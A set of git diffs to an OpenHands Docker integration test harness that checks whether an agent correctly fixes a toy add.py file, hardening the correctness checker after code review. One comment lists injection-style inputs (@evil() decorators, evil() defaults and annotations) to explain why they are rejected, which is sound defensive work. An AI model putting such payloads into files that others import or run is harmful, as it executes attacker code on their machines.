                 f"openhands/{family_alias.family}: harness wall-timeout "
                 f"({self._HARNESS_TIMEOUT_SECONDS + 60}s) exceeded. "
-                f"stdout(tail)={(exc.stdout or b'')[-800:]!r} "
-                f"stderr(tail)={(exc.stderr or b'')[-800:]!r}"
+                # Codex #1048 round-8 nit: with ``text=True``,
+                # ``TimeoutExpired.stdout``/``.stderr`` are ``str | None``,
+                # so a bytes-literal ``or`` fallback would mix ``str`` and
+                # ``bytes`` in the tail slice. Use ``""`` and take the
+                # tail off a homogeneous ``str``.
+                f"stdout(tail)={(exc.stdout or '')[-800:]!r} "
+                f"stderr(tail)={(exc.stderr or '')[-800:]!r}"
             )
 
         # Assert exit 0 with the tail of stdout+stderr for diagnostics
@@ -623,8 +628,13 @@ class TestAider:
             pytest.fail(
                 f"aider/{family_alias.family}: harness wall-timeout "
                 f"({self._HARNESS_TIMEOUT_SECONDS + 30}s) exceeded. "
-                f"stdout(tail)={(exc.stdout or b'')[-800:]!r} "
-                f"stderr(tail)={(exc.stderr or b'')[-800:]!r}"
+                # Codex #1048 round-8 nit: with ``text=True``,
+                # ``TimeoutExpired.stdout``/``.stderr`` are ``str | None``,
+                # so a bytes-literal ``or`` fallback would mix ``str`` and
+                # ``bytes`` in the tail slice. Use ``""`` and take the
+                # tail off a homogeneous ``str``.
+                f"stdout(tail)={(exc.stdout or '')[-800:]!r} "
+                f"stderr(tail)={(exc.stderr or '')[-800:]!r}"
             )
 
         # Assert exit 0 with the tail of stdout+stderr for diagnostics

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -20,9 +20,16 @@
 # assertion, which the wire doesn't emit.
 #
 # This harness is the sibling of ``test_aider.sh``. Same arg parsing,
-# same correctness taxonomy (AST BinOp(op=Add) + runtime add(2,3) == 5),
 # same exit-code taxonomy — with docker-daemon + docker-in-docker
 # sock-passthrough layered on for OpenHands' sandbox-runtime container.
+# The correctness taxonomy diverges: this harness uses an AST-only
+# whitelist (no runtime execution) — it parses ``add.py`` after the
+# agent exits, requires a single top-level ``def add(a, b)`` with no
+# decorators / defaults / annotations and a plain module-level shape,
+# and matches the return expression against a semantic-add whitelist
+# (``a + b`` / ``b + a`` / ``sum([a, b])`` / ``sum((a, b))``). Zero
+# code execution on the host, so a bad / compromised model output can
+# never touch the developer or CI process.
 #
 # Usage:
 #   test_openhands.sh --model <alias> (--base-url <url> | --port <port>) [--timeout <secs>]
@@ -40,7 +47,7 @@
 # works.
 #
 # Exit codes (aligned with ``test_aider.sh``):
-#   0  — OpenHands completed and add(2, 3) == 5 in the rewritten file
+#   0  — OpenHands completed and the AST whitelist matched the rewritten file
 #   1  — arg parse / setup error (also: docker daemon unreachable,
 #        ``timeout`` / ``gtimeout`` missing, rapid-mlx serve unreachable)
 #   2  — OpenHands runtime exited non-zero (agent crashed, LLM refused,
@@ -543,6 +550,42 @@ if len(funcs) > 1:
     sys.exit(1)
 func = funcs[0]
 
+# Codex #1048 round-7 finding #1 (BLOCKING): reject decorators,
+# defaults, arg / return annotations, and type comments on ``def
+# add``. Without this gate the following payloads would satisfy the
+# name / body checks but still run attacker code or rebind ``add``:
+#   * ``@evil()\ndef add(a, b): return a + b`` — decorator runs at
+#     import time
+#   * ``def add(a=evil(), b=0): return a + b`` — default eval'd at
+#     definition time
+#   * ``def add(a: evil(), b) -> evil(): ...`` — 3.10+ evaluates
+#     annotations at def time unless ``from __future__ import
+#     annotations`` is set, which we do not force
+# All three are trivial for a compromised model output to reach; the
+# harness never imports ``add.py``, but a downstream reviewer might
+# copy-run it and get owned. Fail fast at the gate.
+if func.decorator_list:
+    print(
+        "[correctness] AST-ERROR: def add must have no decorators; "
+        f"got {[ast.unparse(d) for d in func.decorator_list]}",
+        file=sys.stderr,
+    )
+    sys.exit(1)
+if func.returns is not None:
+    print(
+        "[correctness] AST-ERROR: def add must have no return "
+        f"annotation; got -> {ast.unparse(func.returns)}",
+        file=sys.stderr,
+    )
+    sys.exit(1)
+if getattr(func, "type_comment", None):
+    print(
+        "[correctness] AST-ERROR: def add must have no type comment; "
+        f"got # type: {func.type_comment}",
+        file=sys.stderr,
+    )
+    sys.exit(1)
+
 # Signature must be exactly (a, b) — kwarg-only / *args / **kwargs
 # defences prevent ``def add(*args): return sum(args)`` etc. which
 # would pass the return check but doesn't match the harness's stated
@@ -555,15 +598,34 @@ if (
     or args.kwarg is not None
     or args.kwonlyargs
     or args.posonlyargs
+    or args.defaults
+    or args.kw_defaults
 ):
     print(
-        f"[correctness] AST-ERROR: def add signature must be (a, b), "
-        f"got args={[a.arg for a in args.args]} vararg={args.vararg} "
-        f"kwarg={args.kwarg} kwonly={[a.arg for a in args.kwonlyargs]} "
-        f"posonly={[a.arg for a in args.posonlyargs]}",
+        f"[correctness] AST-ERROR: def add signature must be (a, b) "
+        f"with no defaults, got args={[a.arg for a in args.args]} "
+        f"vararg={args.vararg} kwarg={args.kwarg} "
+        f"kwonly={[a.arg for a in args.kwonlyargs]} "
+        f"posonly={[a.arg for a in args.posonlyargs]} "
+        f"defaults={len(args.defaults)} "
+        f"kw_defaults={len(args.kw_defaults)}",
         file=sys.stderr,
     )
     sys.exit(1)
+# Codex #1048 round-7: reject arg annotations. ``ast.arg.annotation``
+# is None for a bare ``a`` / ``b``, non-None for ``a: evil()``. Even
+# if ``from __future__ import annotations`` were in the module we
+# still disallow annotations here — anything the harness accepts must
+# match "pure Python change '-' to '+' in the return statement" — so
+# an annotation is off-taxonomy regardless of when it evaluates.
+for a in args.args:
+    if a.annotation is not None:
+        print(
+            f"[correctness] AST-ERROR: def add arg {a.arg!r} must have "
+            f"no annotation; got : {ast.unparse(a.annotation)}",
+            file=sys.stderr,
+        )
+        sys.exit(1)
 
 # Body: allow a leading docstring (Expr(Constant(str))) but require the
 # next statement to be a Return with a whitelisted expression, and

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -188,8 +188,17 @@ try:
 except ValueError:
     print(f"ERROR: non-numeric port in {url!r}", file=sys.stderr)
     sys.exit(1)
-if not host or port is None:
-    print(f"ERROR: could not extract host/port from {url!r}", file=sys.stderr)
+# Codex #1048 round-8 side-effect: preserving path exposed a
+# pre-existing gap — a proxied URL like
+# ``https://gateway.example.com/rapid/v1`` has no explicit port, so
+# ``parsed.port`` is None even though the URL is well-formed. Default
+# to the scheme-standard port (80 for http, 443 for https) so those
+# deployments no longer trip the "could not extract" gate. Explicit
+# ports still win.
+if port is None:
+    port = {"http": 80, "https": 443}[parsed.scheme]
+if not host:
+    print(f"ERROR: could not extract host from {url!r}", file=sys.stderr)
     sys.exit(1)
 
 # urllib strips the surrounding brackets from IPv6 hosts already
@@ -199,19 +208,28 @@ if not host or port is None:
 # the URL rebuild below preserves ``https://`` when the caller passed
 # an HTTPS remote-serve node. Previous code hard-wired ``http://`` and
 # would silently connect over the wrong protocol.
-print(f"{parsed.scheme}\t{host}\t{port}")
+# Codex #1048 round-8 finding #1 (BLOCKING): also emit the path so the
+# URL rebuild does not silently drop a base-path prefix on proxied
+# deployments (``https://gateway.example.com/rapid/v1``). We default
+# to ``/v1`` only if the caller passed no path at all — the rapid-mlx
+# server always exposes chat completions under ``/v1``. Escape TAB so
+# ``\t`` does not collide with awk splitting; urllib does not permit
+# raw TAB in the path anyway (would be percent-encoded first).
+path = parsed.path or "/v1"
+print(f"{parsed.scheme}\t{host}\t{port}\t{path}")
 PYEOF
 )"; then
     echo "ERROR: could not parse --base-url=$BASE_URL" >&2
     exit 1
 fi
 
-# Split three tab-separated fields (scheme / host / port) with awk so
-# we do not have to care about IPv6 colons or the bash-3.2 lack of
-# named-array literals.
+# Split four tab-separated fields (scheme / host / port / path) with
+# awk so we do not have to care about IPv6 colons or the bash-3.2
+# lack of named-array literals.
 CONTAINER_SCHEME="$(printf '%s\n' "$_URL_PARTS" | awk -F '\t' '{print $1}')"
 CONTAINER_HOST="$(printf '%s\n' "$_URL_PARTS" | awk -F '\t' '{print $2}')"
 CONTAINER_PORT="$(printf '%s\n' "$_URL_PARTS" | awk -F '\t' '{print $3}')"
+CONTAINER_PATH="$(printf '%s\n' "$_URL_PARTS" | awk -F '\t' '{print $4}')"
 
 # Codex #1048 round-3 finding #1 (BLOCKING): explicitly validate the
 # tab-delimited shape of the Python parser output BEFORE downstream
@@ -219,11 +237,15 @@ CONTAINER_PORT="$(printf '%s\n' "$_URL_PARTS" | awk -F '\t' '{print $3}')"
 # tab on the ERROR path — but if a future edit accidentally leaks an
 # error onto stdout, we'd construct a malformed CONTAINER_BASE_URL and
 # hit Docker with garbage. This gate turns that into a fast exit 1.
-if [ -z "$CONTAINER_SCHEME" ] || [ -z "$CONTAINER_HOST" ] || [ -z "$CONTAINER_PORT" ] \
+# The path field is also required to start with ``/`` — urllib's
+# ``parsed.path`` guarantees this for absolute URLs so a missing
+# leading slash means the parser is broken and we should fail loud.
+if [ -z "$CONTAINER_SCHEME" ] || [ -z "$CONTAINER_HOST" ] || [ -z "$CONTAINER_PORT" ] || [ -z "$CONTAINER_PATH" ] \
    || ! [[ "$CONTAINER_SCHEME" =~ ^https?$ ]] \
-   || ! [[ "$CONTAINER_PORT" =~ ^[0-9]+$ ]]; then
-    echo "ERROR: URL parser returned malformed scheme/host/port shape " >&2
-    echo "       (raw='$_URL_PARTS' scheme='$CONTAINER_SCHEME' host='$CONTAINER_HOST' port='$CONTAINER_PORT')" >&2
+   || ! [[ "$CONTAINER_PORT" =~ ^[0-9]+$ ]] \
+   || [ "${CONTAINER_PATH:0:1}" != "/" ]; then
+    echo "ERROR: URL parser returned malformed scheme/host/port/path shape " >&2
+    echo "       (raw='$_URL_PARTS' scheme='$CONTAINER_SCHEME' host='$CONTAINER_HOST' port='$CONTAINER_PORT' path='$CONTAINER_PATH')" >&2
     exit 1
 fi
 
@@ -241,14 +263,15 @@ esac
 
 # Re-bracket IPv6 hosts for URL assembly. ``host.docker.internal`` and
 # IPv4 literals go through unchanged; only literal IPv6 addresses need
-# the ``[…]`` wrapping per RFC 3986 §3.2.2. Scheme comes from the
-# parsed input so ``--base-url https://...`` round-trips correctly.
+# the ``[…]`` wrapping per RFC 3986 §3.2.2. Scheme and path come from
+# the parsed input so ``--base-url https://gateway.example.com/rapid/v1``
+# round-trips correctly.
 case "$CONTAINER_HOST" in
     *:*)
-        CONTAINER_BASE_URL="${CONTAINER_SCHEME}://[${CONTAINER_HOST}]:${CONTAINER_PORT}/v1"
+        CONTAINER_BASE_URL="${CONTAINER_SCHEME}://[${CONTAINER_HOST}]:${CONTAINER_PORT}${CONTAINER_PATH}"
         ;;
     *)
-        CONTAINER_BASE_URL="${CONTAINER_SCHEME}://${CONTAINER_HOST}:${CONTAINER_PORT}/v1"
+        CONTAINER_BASE_URL="${CONTAINER_SCHEME}://${CONTAINER_HOST}:${CONTAINER_PORT}${CONTAINER_PATH}"
         ;;
 esac
 
@@ -422,7 +445,7 @@ docker run \
     "$OPENHANDS_IMAGE" \
     python -m openhands.core.main \
         -i "$MAX_ITERATIONS" \
-        -d /workspace \
+        -d /opt/workspace_base \
         -t "The file add.py in the current workspace has a bug: it returns a - b when it should return a + b. Open add.py, change the '-' operator to '+' in the return statement, and save the file. Do not modify anything else. Once the file is saved, stop." \
     >"$LOG" 2>&1
 STATUS=$?

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -1,0 +1,408 @@
+#!/bin/bash
+# OpenHands Docker E2E integration harness against a running `rapid-mlx serve`.
+#
+# What it proves:
+#   1. OpenHands' CodeActAgent can connect to rapid-mlx's OpenAI-compatible
+#      endpoint via LiteLLM's ``openai/<alias>`` provider prefix.
+#   2. OpenHands' text-action edit format (``<execute_bash>...``,
+#      ``<execute_ipython>...``, and its file-write markdown blocks —
+#      parsed by OpenHands itself, NOT via OpenAI tool_calls) actually
+#      rewrites a local file the way we asked ("fix the bug in add.py —
+#      add, not subtract").
+#
+# Why the correctness signal is NOT OpenAI tool_calls: OpenHands'
+# native wire (openhands.yaml capabilities.function_calling: false) is a
+# text-action format. The CodeActAgent parses the model's plaintext
+# reply, extracts actions, and applies file edits through its sandbox
+# runtime. So the pass gate is whether the executed ``add()`` really
+# returns ``a + b`` after openhands exits — not a simple grep, which
+# would flake if the model reformats the body, and not a tool_call
+# assertion, which the wire doesn't emit.
+#
+# This harness is the sibling of ``test_aider.sh``. Same arg parsing,
+# same correctness taxonomy (AST BinOp(op=Add) + runtime add(2,3) == 5),
+# same exit-code taxonomy — with docker-daemon + docker-in-docker
+# sock-passthrough layered on for OpenHands' sandbox-runtime container.
+#
+# Usage:
+#   test_openhands.sh --model <alias> (--base-url <url> | --port <port>) [--timeout <secs>]
+#
+# ``--base-url`` takes the full ``http[s]://host:port/v1`` URL and is the
+# preferred form — it lets the Python wrapper pass whatever URL the
+# ``rapid_mlx_server`` fixture is actually pointed at. Regardless of the
+# host in ``--base-url``, the URL passed into the OpenHands container is
+# rewritten to ``http://host.docker.internal:PORT/v1`` — from inside the
+# container ``localhost`` refers to the container itself, not the host
+# where rapid-mlx is listening.
+#
+# Exit codes (aligned with ``test_aider.sh``):
+#   0  — OpenHands completed and add(2, 3) == 5 in the rewritten file
+#   1  — arg parse / setup error (also: docker daemon unreachable,
+#        ``timeout`` / ``gtimeout`` missing, rapid-mlx serve unreachable)
+#   2  — OpenHands runtime exited non-zero (agent crashed, LLM refused,
+#        transport blip; runtime container failed to boot)
+#   3  — OpenHands ran but the file wasn't corrected (edit didn't apply;
+#        agent hit ``-i`` iteration cap without solving; LLM refused;
+#        wrong operator, etc.)
+#   4  — timeout
+
+# ``set -euo pipefail`` so an unchecked setup step (``mktemp``,
+# ``docker info``, ``mkdir``) aborts the harness instead of running
+# OpenHands against a half-configured scratch dir. Mirrors the same
+# lesson-learned gate baked into ``test_aider.sh`` (round-2 finding #4).
+set -euo pipefail
+
+# ---------------------------------------------------------------------------
+# Pinned image tags — see PR body for the version-selection rationale.
+#
+# ``ghcr.io/all-hands-ai/openhands`` moved on from ``docker.all-hands.dev``
+# (the old registry's DNS no longer resolves — see the PR body for the
+# transition timeline). We pin to a specific ``0.9.0`` tag (multi-arch
+# manifest — both linux/arm64 and linux/amd64) so the harness can't
+# silently drift when a new OpenHands release lands upstream.
+#
+# The runtime container tag is coupled to the app tag: OpenHands
+# derives its own hash-tagged runtime image from this baseline, so the
+# baseline must match the OpenHands major version. Currently:
+#   od_v0.9.0_image_nikolaik___python-nodejs_tag_python3.11-nodejs22
+# ---------------------------------------------------------------------------
+OPENHANDS_IMAGE="ghcr.io/all-hands-ai/openhands:0.9.0"
+OPENHANDS_RUNTIME_IMAGE="ghcr.io/all-hands-ai/runtime:od_v0.9.0_image_nikolaik___python-nodejs_tag_python3.11-nodejs22"
+
+TIMEOUT=600
+MAX_ITERATIONS=10
+MODEL=""
+PORT=""
+BASE_URL=""
+VERBOSE=0
+
+usage() {
+    echo "Usage: $0 --model <alias> (--base-url <url> | --port <port>) [--timeout <secs>] [--max-iterations <n>] [-v]" >&2
+    exit 1
+}
+
+while [ $# -gt 0 ]; do
+    case "$1" in
+        --model) MODEL="$2"; shift 2 ;;
+        --port) PORT="$2"; shift 2 ;;
+        --base-url) BASE_URL="$2"; shift 2 ;;
+        --timeout) TIMEOUT="$2"; shift 2 ;;
+        --max-iterations) MAX_ITERATIONS="$2"; shift 2 ;;
+        -v|--verbose) VERBOSE=1; shift ;;
+        -h|--help) usage ;;
+        *) echo "unknown arg: $1" >&2; usage ;;
+    esac
+done
+
+if [ -z "$MODEL" ] || { [ -z "$BASE_URL" ] && [ -z "$PORT" ]; }; then
+    usage
+fi
+
+# Derive BASE_URL from --port only if --base-url wasn't given (back-compat
+# for the standalone invocation shape kept for local docs/dev). --base-url
+# wins so a Python wrapper that always passes the full URL is authoritative.
+if [ -z "$BASE_URL" ]; then
+    BASE_URL="http://127.0.0.1:${PORT}/v1"
+fi
+
+# Extract the port from --base-url regardless of source. The URL passed
+# INTO the OpenHands container must use ``host.docker.internal`` as the
+# host (from inside the container ``localhost``/``127.0.0.1`` refers to
+# the container itself, not the M3 Ultra host where rapid-mlx is
+# listening). We keep BASE_URL as-is for the host-side /v1/models probe.
+CONTAINER_PORT="$(printf '%s' "$BASE_URL" | sed -E 's#https?://[^:/]+:([0-9]+)/?.*#\1#')"
+if ! [[ "$CONTAINER_PORT" =~ ^[0-9]+$ ]]; then
+    echo "ERROR: could not extract port from --base-url=$BASE_URL" >&2
+    exit 1
+fi
+CONTAINER_BASE_URL="http://host.docker.internal:${CONTAINER_PORT}/v1"
+
+# ``python3`` powers the correctness check below (AST parse + runtime
+# ``add(2, 3) == 5`` assertion). Fail early with a clear message so a
+# broken system Python doesn't get diagnosed as an OpenHands failure.
+if ! command -v python3 >/dev/null 2>&1; then
+    echo "ERROR: python3 not found on PATH — required for correctness check" >&2
+    exit 1
+fi
+
+# Docker daemon must be reachable BEFORE we spend 5-10 minutes staging
+# the sandbox runtime. ``docker info`` is the canonical "server reachable"
+# probe (``docker version`` returns the client version even when the
+# daemon socket is dead).
+if ! docker info >/dev/null 2>&1; then
+    echo "ERROR: docker daemon not reachable — start Docker Desktop / dockerd first" >&2
+    exit 1
+fi
+
+# Pick a timeout wrapper — same requirement as ``test_aider.sh``: we need
+# the whole exec'd tree killed on timeout, and BSD's built-in no-timeout
+# fallback would leak a running ``docker run`` past harness exit.
+if command -v gtimeout >/dev/null 2>&1; then
+    TIMEOUT_CMD=(gtimeout --preserve-status --kill-after=15 "$TIMEOUT")
+elif command -v timeout >/dev/null 2>&1; then
+    TIMEOUT_CMD=(timeout --preserve-status --kill-after=15 "$TIMEOUT")
+else
+    echo "ERROR: neither 'timeout' nor 'gtimeout' available — install " >&2
+    echo "       coreutils (macOS: 'brew install coreutils') before running." >&2
+    exit 1
+fi
+
+# Scratch state — HOME override so the OpenHands agent drops its config /
+# cache into a throw-away tree we can nuke on exit. We NEVER touch the
+# operator's real ``~/.openhands*`` state. ``mktemp -d`` both for atomic
+# creation and to avoid predictable-path rm -rf races.
+WORKDIR="$(mktemp -d -t openhands-test-work.XXXXXX)"
+OPENHANDS_STATE="$(mktemp -d -t openhands-test-state.XXXXXX)"
+mkdir -p "$OPENHANDS_STATE/.openhands"
+
+# Uniqueness for the docker container name — timestamp + PID + $$ nesting
+# guard so parallel harness invocations (or a stale prior run's zombie)
+# can't collide on the name. We also keep the value in a variable so the
+# cleanup trap can force-remove even if the run was aborted before
+# ``docker run`` returned.
+CONTAINER_NAME="openhands-test-$$-$(date +%s)"
+
+cleanup() {
+    local rc=$?
+    # Best-effort: ``docker rm -f`` succeeds silently if the container
+    # already exited via ``--rm``; suppress stderr so a race with the
+    # auto-remove doesn't spam an error into the harness log. We do NOT
+    # ``docker system prune`` — that would nuke the operator's other
+    # containers (violates G11 + the operator-lane guardrail).
+    docker rm -f "$CONTAINER_NAME" >/dev/null 2>&1 || true
+    if [ "$VERBOSE" -eq 0 ]; then
+        rm -rf "$WORKDIR" "$OPENHANDS_STATE" 2>/dev/null || true
+    else
+        echo "VERBOSE: preserved WORKDIR=$WORKDIR OPENHANDS_STATE=$OPENHANDS_STATE" >&2
+    fi
+    exit "$rc"
+}
+trap cleanup EXIT INT TERM
+
+# Toy file with an obvious bug — identical to ``test_aider.sh`` so the
+# two harnesses agree on the pass gate and a divergence between agents
+# is obviously the agent, not the fixture.
+cat > "$WORKDIR/add.py" <<'PYEOF'
+def add(a, b):
+    return a - b  # BUG
+PYEOF
+
+# Sanity: is the server actually up on the HOST-side URL? A quick
+# /v1/models probe with a 5 s timeout catches "operator forgot to boot
+# serve" instantly instead of eating the full harness timeout. We probe
+# BASE_URL (host-visible), not CONTAINER_BASE_URL (only meaningful
+# inside the container).
+if ! curl -sS -m 5 "$BASE_URL/models" >/dev/null 2>&1; then
+    echo "ERROR: rapid-mlx server not reachable at $BASE_URL" >&2
+    exit 1
+fi
+
+# LiteLLM (which OpenHands uses under the hood) needs the ``openai/``
+# prefix to route through the OpenAI-compat chat completions path against
+# our custom base URL — without it LiteLLM tries to pick a provider
+# from the alias string and fails on non-canonical rapid-mlx aliases.
+LITELLM_MODEL="openai/${MODEL}"
+
+# Ensure the runtime base image is present locally — if the pull fails
+# we want that surfaced as a setup error (exit 1), not misdiagnosed as
+# an OpenHands runtime error (exit 2). ``docker pull`` with ``--quiet``
+# is idempotent and prints only the digest on success; with ``2>&1`` we
+# fold pull chatter (progress lines) into the harness log for diagnostics.
+for img in "$OPENHANDS_IMAGE" "$OPENHANDS_RUNTIME_IMAGE"; do
+    if ! docker image inspect "$img" >/dev/null 2>&1; then
+        echo "[test_openhands.sh] pulling missing image: $img"
+        if ! docker pull "$img" 2>&1 | tail -5 >&2; then
+            echo "ERROR: docker pull failed for $img" >&2
+            exit 1
+        fi
+    fi
+done
+
+echo "[test_openhands.sh] model=$MODEL host-base-url=$BASE_URL container-base-url=$CONTAINER_BASE_URL"
+echo "[test_openhands.sh] litellm-model=$LITELLM_MODEL timeout=${TIMEOUT}s max-iter=${MAX_ITERATIONS}"
+echo "[test_openhands.sh] openhands-image=$OPENHANDS_IMAGE"
+echo "[test_openhands.sh] runtime-image=$OPENHANDS_RUNTIME_IMAGE"
+echo "[test_openhands.sh] scratch workdir=$WORKDIR openhands-state=$OPENHANDS_STATE"
+echo "[test_openhands.sh] container-name=$CONTAINER_NAME"
+echo "[test_openhands.sh] BEFORE add.py:"
+cat "$WORKDIR/add.py"
+echo "--------"
+
+# Run OpenHands one-shot with ``python -m openhands.core.main -t "..."``.
+# Key env-var wiring:
+#   SANDBOX_CONTAINER_IMAGE  — the pre-built runtime; when this image
+#                              string contains the ``ghcr.io/all-hands-ai
+#                              /runtime`` repo prefix, OpenHands' builder
+#                              short-circuits its Dockerfile-from-scratch
+#                              path and reuses / derives from this image
+#                              instead of pulling ``nikolaik`` from Docker
+#                              Hub. Saves ~5 minutes of apt-install on a
+#                              cold M3 Ultra.
+#   SANDBOX_USER_ID          — matches the host UID so files created by
+#                              the sandbox in our bind-mounted WORKDIR
+#                              come back owned by the invoking user, not
+#                              root. Without this, cleanup rm -rf fails
+#                              on macOS when the docker VM's overlay
+#                              driver leaves root-owned artifacts.
+#   SANDBOX_TIMEOUT          — per-command timeout inside the sandbox;
+#                              default 120s is tight for slow local
+#                              inference, we bump to 180s.
+#   WORKSPACE_MOUNT_PATH     — the ABSOLUTE HOST PATH that OpenHands will
+#                              bind-mount into the sandbox as its
+#                              workspace. This is critical — without it
+#                              OpenHands uses a default path that won't
+#                              exist / won't match our WORKDIR.
+#   WORKSPACE_BASE           — the in-container path the sandbox sees as
+#                              the workspace. Matches the openhands
+#                              image default (``/opt/workspace_base``).
+#   LLM_BASE_URL/MODEL/API_KEY — LiteLLM wiring for the rapid-mlx endpoint.
+# Docker flags:
+#   --add-host host.docker.internal:host-gateway  — required on Linux
+#                              (macOS Docker Desktop injects this
+#                              automatically, but Linux CI needs the
+#                              explicit --add-host). Keeping it here
+#                              works on both platforms and is idempotent.
+#   -v /var/run/docker.sock:/var/run/docker.sock — docker-in-docker sock
+#                              passthrough so OpenHands can spawn its
+#                              sandbox runtime container.
+#   --pull=missing             — only pull if not already cached; the
+#                              two images ARE cached (we ensured above),
+#                              so this is a no-op belt-and-braces guard.
+LOG="$WORKDIR/openhands.log"
+STATUS=0
+
+# We disable ``set -e`` for the docker run so a non-zero exit (timeout,
+# agent crash, LLM refusal, transport blip) is captured into $STATUS
+# instead of aborting the harness before we can print the diagnostic tail.
+set +e
+"${TIMEOUT_CMD[@]}" \
+docker run \
+    --rm \
+    --name "$CONTAINER_NAME" \
+    -e "SANDBOX_CONTAINER_IMAGE=$OPENHANDS_RUNTIME_IMAGE" \
+    -e "SANDBOX_USER_ID=$(id -u)" \
+    -e "SANDBOX_TIMEOUT=180" \
+    -e "WORKSPACE_MOUNT_PATH=$WORKDIR" \
+    -e "WORKSPACE_BASE=/opt/workspace_base" \
+    -e "LLM_BASE_URL=$CONTAINER_BASE_URL" \
+    -e "LLM_MODEL=$LITELLM_MODEL" \
+    -e "LLM_API_KEY=rapidmlx" \
+    -v /var/run/docker.sock:/var/run/docker.sock \
+    -v "$WORKDIR:/opt/workspace_base" \
+    -v "$OPENHANDS_STATE/.openhands:/home/openhands/.openhands" \
+    --add-host host.docker.internal:host-gateway \
+    --pull=missing \
+    "$OPENHANDS_IMAGE" \
+    python -m openhands.core.main \
+        -i "$MAX_ITERATIONS" \
+        -t "The file add.py in the current workspace has a bug: it returns a - b when it should return a + b. Open add.py, change the '-' operator to '+' in the return statement, and save the file. Do not modify anything else. Once the file is saved, stop." \
+    >"$LOG" 2>&1
+STATUS=$?
+set -e
+
+# Detect timeout: 124 = coreutils timeout (SIGTERM path); 137 = --kill-after
+# escalation (SIGKILL); 143 = SIGTERM. All three mean "we killed it, not
+# OpenHands exiting cleanly with a non-zero code."
+if [ "$STATUS" -eq 124 ] || [ "$STATUS" -eq 137 ] || [ "$STATUS" -eq 143 ]; then
+    echo "[test_openhands.sh] TIMEOUT after ${TIMEOUT}s" >&2
+    echo "--- last 60 lines of openhands log ---" >&2
+    tail -60 "$LOG" >&2 || true
+    exit 4
+fi
+
+echo "[test_openhands.sh] openhands exit=$STATUS"
+echo "--- last 60 lines of openhands log ---"
+tail -60 "$LOG" || true
+echo "--------"
+echo "[test_openhands.sh] AFTER add.py:"
+cat "$WORKDIR/add.py"
+echo "--------"
+
+if [ "$STATUS" -ne 0 ]; then
+    echo "[test_openhands.sh] FAIL: openhands exited $STATUS" >&2
+    exit 2
+fi
+
+# Correctness check — same as ``test_aider.sh`` (round-2 finding #2):
+# import the rewritten module and execute ``add(2, 3) == 5``, then assert
+# the AST contains a semantic-add operation (``BinOp(op=Add)`` OR
+# ``sum([a, b])`` OR ``operator.add(a, b)``) so that a mischievous
+# ``return 5`` cheat doesn't fake a pass.
+if ! python3 - "$WORKDIR" <<'PYEOF'
+import ast
+import importlib.util
+import sys
+
+workdir = sys.argv[1]
+target = f"{workdir}/add.py"
+
+with open(target) as fh:
+    source = fh.read()
+
+# Load the module.
+spec = importlib.util.spec_from_file_location("_openhands_test_add", target)
+mod = importlib.util.module_from_spec(spec)
+try:
+    spec.loader.exec_module(mod)
+except Exception as exc:  # noqa: BLE001 — diagnose whatever it was
+    print(f"[correctness] MODULE-LOAD-ERROR: {exc}", file=sys.stderr)
+    sys.exit(1)
+
+if not hasattr(mod, "add") or not callable(mod.add):
+    print("[correctness] MODULE-SHAPE-ERROR: add() missing or not callable",
+          file=sys.stderr)
+    sys.exit(1)
+
+# Runtime check.
+try:
+    got = mod.add(2, 3)
+except Exception as exc:  # noqa: BLE001
+    print(f"[correctness] RUNTIME-ERROR: add(2, 3) raised {exc!r}",
+          file=sys.stderr)
+    sys.exit(1)
+
+if got != 5:
+    print(f"[correctness] VALUE-ERROR: add(2, 3) returned {got!r}, expected 5",
+          file=sys.stderr)
+    sys.exit(1)
+
+# Structural check — reject ``return 5`` and other hard-code cheats.
+tree = ast.parse(source)
+funcs = [n for n in ast.walk(tree)
+         if isinstance(n, ast.FunctionDef) and n.name == "add"]
+if not funcs:
+    print("[correctness] AST-ERROR: no def add() in module", file=sys.stderr)
+    sys.exit(1)
+
+has_add_op = False
+for func in funcs:
+    for node in ast.walk(func):
+        if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
+            has_add_op = True
+            break
+        # sum([a, b]) / operator.add(a, b) also qualify as "semantic add".
+        if isinstance(node, ast.Call):
+            name = getattr(node.func, "id", "") or getattr(
+                getattr(node.func, "attr", None), "__str__", lambda: ""
+            )()
+            if name in ("sum", "add"):
+                has_add_op = True
+                break
+
+if not has_add_op:
+    print("[correctness] AST-ERROR: add() body has no + BinOp / sum(...) call",
+          file=sys.stderr)
+    sys.exit(1)
+
+print("[correctness] OK: add(2, 3) == 5, AST contains + BinOp")
+sys.exit(0)
+PYEOF
+then
+    echo "[test_openhands.sh] FAIL: add.py correctness check failed" >&2
+    echo "--- final add.py ---" >&2
+    cat "$WORKDIR/add.py" >&2
+    exit 3
+fi
+
+echo "[test_openhands.sh] PASS: add(2, 3) == 5 after openhands rewrite"
+exit 0

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -159,7 +159,17 @@ if parsed.scheme not in ("http", "https"):
     sys.exit(1)
 
 host = parsed.hostname or ""
-port = parsed.port
+# Codex #1048 round-5 nit: ``parsed.port`` raises ``ValueError`` on a
+# non-numeric port (``http://127.0.0.1:abc/v1``) which would leak a
+# Python traceback ahead of the bash wrapper could-not-parse error.
+# Catch it explicitly so the failure mode is a single clean message.
+# NOTE: bash 3.2 scans heredoc content inside ``$(...)`` for quote
+# balance, so keep this block apostrophe-free.
+try:
+    port = parsed.port
+except ValueError:
+    print(f"ERROR: non-numeric port in {url!r}", file=sys.stderr)
+    sys.exit(1)
 if not host or port is None:
     print(f"ERROR: could not extract host/port from {url!r}", file=sys.stderr)
     sys.exit(1)
@@ -455,17 +465,25 @@ except SyntaxError as exc:
     print(f"[correctness] SYNTAX-ERROR: {exc}", file=sys.stderr)
     sys.exit(1)
 
+# Codex #1048 round-5 finding #1 (BLOCKING): ``ast.walk`` walked all
+# nested nodes, so ``def wrapper(): def add(a, b): return a + b`` would
+# find the nested ``add`` and pass — but the module doesn't expose a
+# top-level ``add`` any more, so an actual user of the file gets
+# ``NameError``. Restrict to top-level statements only.
 funcs = [
-    n for n in ast.walk(tree)
+    n for n in tree.body
     if isinstance(n, ast.FunctionDef) and n.name == "add"
 ]
 if not funcs:
-    print("[correctness] AST-ERROR: no def add() in module", file=sys.stderr)
+    print(
+        "[correctness] AST-ERROR: no top-level def add() in module",
+        file=sys.stderr,
